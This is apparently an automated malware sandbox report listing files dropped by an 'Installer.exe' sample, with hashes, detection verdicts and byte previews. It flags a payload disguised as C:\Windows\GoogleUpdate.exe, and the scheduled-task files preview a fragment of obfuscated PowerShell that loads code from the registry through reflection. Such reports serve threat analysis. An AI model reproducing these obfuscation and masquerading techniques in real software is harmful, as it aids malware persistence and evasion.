Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L....(.[.........."!.........................................................0......t(....@A.............................................................?... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\y0R613SHbbfc

Download File

Process:	C:\Users\user\Desktop\Installer.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
Category:	dropped
Size (bytes):	110660
Entropy (8bit):	7.929477716329847
Encrypted:	false
SSDEEP:	3072:IhDdvvgcv2K9SsvfGbqAXAPK3+KHdcAVdM:SBZ9MsvfGbqAX+0hHHM
MD5:	4FED943F8E07668F6C940497BB59D86C
SHA1:	1CD55E2519AA139318E73C425260BA0A23742CA3
SHA-256:	0A85942B3EFC988E9D51DC14023249A7021068D341AFEBA721F1753E5EE690F6
SHA-512:	3D79FF47D46D1437530037A516CF5F4F7035C3F8EF022C0F76A706DDB9CE78812CA61A16B3DF5C9C3843A8A6BA9C4557035252CB47D0A3C5F8BB42A1806615F7
Malicious:	false
Reputation:	unknown
Preview:	......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............\|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.A.:.....X.l..1lN23....._....m.....'.........S.. ..W....'.c....1....5.5.}j.Ly..k;.\...q.U..Q...bgJpW.(QKI]&b.QE.&(.._.C.....B...-..h.Dh......{..J*.qNN...Z......?......................./.H.v..O.\|......I"]Z...I.y..[

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	45177
Entropy (8bit):	5.074672989013172
Encrypted:	false
SSDEEP:	768:ceW8JV3IpNBQkj22h4iUx/aVkfrRJv5FLv0znHoE8ard3uKPSOdB8N/zltAHkhNY:ceJJV3CNBQkj22h4iUx/aVkflJnLvAH/
MD5:	FA0D737CAF174B5F1E345D9302DF942F
SHA1:	270BF566DE3479E185B9B7880E5D8BD0D6796C52
SHA-256:	507B7978B6A9D4C029ECD3D983BB21697D35703019870C19B7CB0A6C64913248
SHA-512:	9EDFCBB2D9E75A95BBB3D0467DB520DE3FC1BB445A4BF46D84BA6ADA6B7E97D846293B7DB645601A9E7FD3330C6C0F3E85056B1A93C50B8166C8EE33721DF86B
Malicious:	false
Reputation:	unknown
Preview:	PSMODULECACHE.F..._.%.....?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PKI\PKI.psd1........Export-Certificate........Get-CertificateNotificationTask........Get-PfxData........New-CertificateNotificationTask........Import-PfxCertificate....#...Set-CertificateAutoEnrollmentPolicy........Export-PfxCertificate........Switch-Certificate........New-SelfSignedCertificate....%...Get-CertificateEnrollmentPolicyServer....%...Add-CertificateEnrollmentPolicyServer....(...Remove-CertificateEnrollmentPolicyServer........Import-Certificate........Test-Certificate........Get-Certificate...."...Remove-CertificateNotificationTask....#...Get-CertificateAutoEnrollmentPolicy........_.o.....q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...R

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	21668
Entropy (8bit):	5.4591924124145566
Encrypted:	false
SSDEEP:	384:ttCRLQ8uiOlIs5IISVpiiNmQu0oMNsInR5ZoFRVrdWSSMQv3++nYc:h1JIsrU0iNmQBN5Tap2M9c
MD5:	19B959675ED617BC456B4F00E7868421
SHA1:	41BB6265A19F5FB6BAF34C4BC4DBB0E16DB08BB2
SHA-256:	FA388393612B2B3C8D52F5475B8852136F471D957EFCADA752CA198DFE28F35E
SHA-512:	E43DA13ECCC2240EC026B48C3F33EE80DE6000E42923F806A8F519968C9BAE27541CB7B90268216CBBA961B596E785B0AF6AF6C91595A2EEDDDD36AD61E7E5F2
Malicious:	false
Reputation:	unknown
Preview:	@...e................................................@..........H...............<@.^.L."My...::..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)w.......System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\7321.tmp

Download File

Process:	C:\Users\user\AppData\LocalLow\1u8JL0XE.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	335360
Entropy (8bit):	7.548086611496671
Encrypted:	false
SSDEEP:	6144:RBx7z3Bre16M01nguKBmmlbvx0zKGkl5EiCtuhNjtANJ4tDWhRaitlopYR:RnBreIfKNJVZotuhNZKxrYpI
MD5:	DA87A0A2ABA605908BF8B9A3F4377481
SHA1:	5CAC4EA0B3F0CC2D7C04655DB12AD0443CBAA5CF
SHA-256:	22EE7B8104599B47313195598FFC34AAFD6A6552DCCE0E7B3232CED3A90AC9A4
SHA-512:	55A8A27A013CB2C3DEDA81779D89AB956A5F57D00A155496ABC7BF3C5A87F3B7C41058AB3681CBBD0406F69EA01C4FFC3E5779C2CA676088A68CB87F19C34C28
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 81%
Reputation:	unknown
Preview:	MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$..........;..eh..eh..eh.fi..eh.`iS.eh..`i..eh..ai..eh..fi..eh.ai..eh.di..eh..dhE.eh^.li..eh^..h..eh...h..eh^.gi..ehRich..eh........PE..d......b.........."..........n......D..........@.............................`............`..................................................e..P...............(............P..d....Q..p............................P..@...............x............................text...0........................... ..`.rdata.............................@..@.data...X....p.......`..............@....pdata..(............l..............@..@_RDATA..\............\|..............@..@.rsrc................~..............@..@.reloc..d....P......................@..B........................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cjywaxdq.qkn.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ku2ntze0.uoe.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oh5ppfi5.h0t.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ohii1o4j.54v.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uypg1j40.2pu.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uznoyev3.hft.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vwjpafsu.sl5.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wc1cvban.fo0.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zbjaiqmq.fub.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zrnzvw1d.1kg.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Windows\GoogleUpdate.exe

Download File

Process:	C:\Users\user\AppData\LocalLow\OBH7JYJN.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	154456
Entropy (8bit):	5.948865342404173
Encrypted:	false
SSDEEP:	3072:UAt2Sb2m5oyiTOZQvfSERdX9Zk8ACB+6l4nfS3wjVSzpD2MhkNJoSloS+Zh52ruK:fxwjRjB+O+/H
MD5:	9A66A3DE2589F7108426AF37AB7F6B41
SHA1:	12950D906FF703F3A1E0BD973FCA2B433E5AB207
SHA-256:	A913415626433D5D0F07D3EC4084A67FF6F5138C3C3F64E36DD0C1AE4C423C65
SHA-512:	A4E81BFFBFA4D3987A8C10CEC5673FD0C8AECBB96104253731BFCAB645090E631786FF7BDE78607CBB2D242EE62051D41658059FCBBC4990C40DBB0FEC66FCD6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3...w...w...w....cg.}....ce......cd.o......f......e......^....cy.z...w...........v.....i.v...w...M.......v...Richw...........................PE..L.....u`............................Bt.......0....@..........................`......g.....@.................................LQ..x....`..P............&..X5...P.......[..T............................[..@............P..H............................text...T........................... ..`.data........0......."..............@....idata.......P.......*..............@..@.rsrc...P....`.......4..............@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	17944
Entropy (8bit):	5.440875424209391
Encrypted:	false
SSDEEP:	384:qteJGh6rdjn5wOVA61wYSVZEUAaSXCQLnfcySDOYb:KgL5wOVXrU2UjSXCQLEb
MD5:	F1ACA6AFAE07DAEDD3897B95184E9E69
SHA1:	164A374DE70C3BCB4E6ED17211E26F2E11B609C7
SHA-256:	E7848942505762109E299CEC29E03716BAF324BB49DFB8D95DB70D43F8A6DB83
SHA-512:	AA0163FF8B8BCED3919D0F6979E1C63584B956C703570352D0ADAE96D31C5E6AA2919701027951359610FA092F97B743EA4E5B789A312055A846A9F850440421
Malicious:	false
Reputation:	unknown
Preview:	@...e...........9...............................................H...............<@.^.L."My...:'..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.............System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	11606
Entropy (8bit):	4.8910535897909355
Encrypted:	false
SSDEEP:	192:Dxoe5IpObxoe5lib4LVsm5emdYVFn3eGOVpN6K3bkkjo5UgkjDt4iWN3yBGHc9so:Wwib4LEVoGIpN6KQkj2jkjh4iUxm44Q2
MD5:	7A57D8959BFD0B97B364F902ACD60F90
SHA1:	7033B83A6B8A6C05158BC2AD220D70F3E6F74C8F
SHA-256:	47B441C2714A78F9CFDCB7E85A4DE77042B19A8C4FA561F435471B474B57A4C2
SHA-512:	83D8717841E22BB5CB2E0924E5162CF5F51643DFBE9EE88F524E7A81B8A4B2F770ED7BFE4355866AFB106C499AB7CD210FA3642B0424813EB03BB68715E650CC
Malicious:	false
Reputation:	unknown
Preview:	PSMODULECACHE.............S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script..........Y.....C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1192
Entropy (8bit):	5.303256077534299
Encrypted:	false
SSDEEP:	24:3aBPpQrLAo4KAxX5qRPD42HZFe9t4CvKuKnKJJxb:qBPerB4nqRL/HZFe9t4Cv94arb
MD5:	881024516CBE7AEFA030EE5866CF93A0
SHA1:	875007370CE79BC3D89D5BAFFB1CE0F3E83791A4
SHA-256:	B36330DB3D60914058B0D0B5F4DD1B4CED7F45171034471CC63376C7079F59A4
SHA-512:	4EDD1FF0C10D5A22FAFF9FEA3451A870A2937511B96A54D78B308ED20B91ABA1CCFBC868E5559C3CA504C0DA38BAD6F6A8052E0932C2878D4661C65CC3F7E071
Malicious:	false
Reputation:	unknown
Preview:	@...e...........................................................8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Windows\Tasks\dialersvc32.job

Download File

Process:	C:\Windows\System32\dialer.exe
File Type:	data
Category:	dropped
Size (bytes):	1408
Entropy (8bit):	3.743072495307743
Encrypted:	false
SSDEEP:	24:1H8zK5tG3HPnyff86avRYYKaHYb6sCbaHKBlcwPN0+sviH:1Hu/6ahTGC2rg
MD5:	DB0067292F3F7EB166BA93495E615B0D
SHA1:	BE9E072FA6FBC15B7ADC7478ECB8076963ED9AAD
SHA-256:	2BD0AFABA16A3627F9F4BBFD499BD852BFEA668894A03E1063046F1775682169
SHA-512:	A03E25F1EEBEADDCA1B8A80392DBE295C329FAE59FBA0E62888EF51A88C4CA432BF5748E9973B29ABD3CDFC9793B4533A1E6B693011A33D0DEB54D473E39411C
Malicious:	false
Reputation:	unknown
Preview:	....,....L.:.....mF.N.....<... .....s.................................p.o.w.e.r.s.h.e.l.l...-."...(.\.".{.1.}.{.0.}.\.". .-.f. .'.e.T.'.,.'.S.'.). . .(.\.".6.T.\.".+.\.".o.\.".). . .(.[.t.Y.p.E.].(.\.".{.2.}.{.0.}.{.4.}.{.1.}.{.3.}.\.". .-.F.'.e.'.,.'.m.B.L.'.,.'.r.e.f.l.'.,.'.y.'.,.'.c.t.i.O.n...A.s.S.e.'.). . .). . .;. .$.D.l.r.4.S. .=. . .[.t.y.P.e.].(.\.".{.3.}.{.1.}.{.2.}.{.4.}.{.0.}.\.".-.F.'.R.y.'.,.'.o.S.O.f.T...W.'.,.'.i.N.3.2...R.'.,.'.M.I.C.R.'.,.'.e.G.i.S.T.'.). . .;. . .$.6.T.O.:.:.(.\.".{.0.}.{.1.}.\.". .-.f. .'.L.'.,.'.o.a.d.'.)...I.n.v.o.k.e.(. . .(...(.\.".{.1.}.{.2.}.{.0.}.\.". .-.f. .'.t.-.I.t.e.m.'.,.'.g.'.,.'.e.'.). .(.\.".v.A.R.I.\.".+.\.".A.b.\.".+.\.".l.E.\.".+.\.".:.D.l.R.4.S.\.".). . .)...\.".V.A.`.l.u.E.\.".:.:.\.".l.O.c.`.A.L.M.`.A.C.h.i.n.e.\."...(.\.".{.2.}.{.1.}.{.0.}.\.". .-.f. .'.e.y.'.,.'.u.b.k.'.,.'.O.p.e.n.S.'.)...I.n.v.o.k.e.(.(.\.".{.1.}.{.0.}.\.".-.f.'.E.'.,.'.S.O.F.T.W.A.R.'.).)...(.\.".{.1.}.{.0.}.{.2.}.\.". .-.f.'.u.'.,.'.G.e.t.V.a.l.'.,.'.e.

C:\Windows\Tasks\dialersvc64.job

Download File

Process:	C:\Windows\System32\dialer.exe
File Type:	data
Category:	dropped
Size (bytes):	1322
Entropy (8bit):	3.7136955944409284
Encrypted:	false
SSDEEP:	24:KN8zK5tG3HPnyff86avRYYKaHYb6sCbaHKBlcwPN7H:Ou/6ahTGCZ
MD5:	47919922F37085B96F854C385583F49F
SHA1:	9C5DCBA4EC74B7FECAA835087FA403E153778D48
SHA-256:	8137374B507E87E5574C72BD93EB5712459C055671235769AFCF114FDF26B5B8
SHA-512:	20986A060706CAB1EE8A2DD62ED3030896D851408BF583E88C839B62EBF613145E556DC12CFCD720C7FF9717BA927995E5B4009073DC11F38F15314724B01661
Malicious:	false
Reputation:	unknown
Preview:	.....(....O.W.J.c.WF.......<... .....s.................................p.o.w.e.r.s.h.e.l.l...-."...(.\.".{.1.}.{.0.}.\.". .-.f. .'.e.T.'.,.'.S.'.). . .(.\.".6.T.\.".+.\.".o.\.".). . .(.[.t.Y.p.E.].(.\.".{.2.}.{.0.}.{.4.}.{.1.}.{.3.}.\.". .-.F.'.e.'.,.'.m.B.L.'.,.'.r.e.f.l.'.,.'.y.'.,.'.c.t.i.O.n...A.s.S.e.'.). . .). . .;. .$.D.l.r.4.S. .=. . .[.t.y.P.e.].(.\.".{.3.}.{.1.}.{.2.}.{.4.}.{.0.}.\.".-.F.'.R.y.'.,.'.o.S.O.f.T...W.'.,.'.i.N.3.2...R.'.,.'.M.I.C.R.'.,.'.e.G.i.S.T.'.). . .;. . .$.6.T.O.:.:.(.\.".{.0.}.{.1.}.\.". .-.f. .'.L.'.,.'.o.a.d.'.)...I.n.v.o.k.e.(. . .(...(.\.".{.1.}.{.2.}.{.0.}.\.". .-.f. .'.t.-.I.t.e.m.'.,.'.g.'.,.'.e.'.). .(.\.".v.A.R.I.\.".+.\.".A.b.\.".+.\.".l.E.\.".+.\.".:.D.l.R.4.S.\.".). . .)...\.".V.A.`.l.u.E.\.".:.:.\.".l.O.c.`.A.L.M.`.A.C.h.i.n.e.\."...(.\.".{.2.}.{.1.}.{.0.}.\.". .-.f. .'.e.y.'.,.'.u.b.k.'.,.'.O.p.e.n.S.'.)...I.n.v.o.k.e.(.(.\.".{.1.}.{.0.}.\.".-.f.'.E.'.,.'.S.O.F.T.W.A.R.'.).)...(.\.".{.1.}.{.0.}.{.2.}.\.". .-.f.'.u.'.,.'.G.e.t.V.a.l.'.,.'.e.

C:\Windows\Temp\__PSScriptPolicyTest_ewr3hefe.irk.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Windows\Temp\__PSScriptPolicyTest_glh4whl5.r4v.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Windows\Temp\__PSScriptPolicyTest_nxgdsgdx.d1v.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

C:\Windows\Temp\__PSScriptPolicyTest_sakrrobh.2st.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	unknown
Preview:	1

\Device\ConDrv

Download File

Process:	C:\Windows\SysWOW64\netsh.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	7
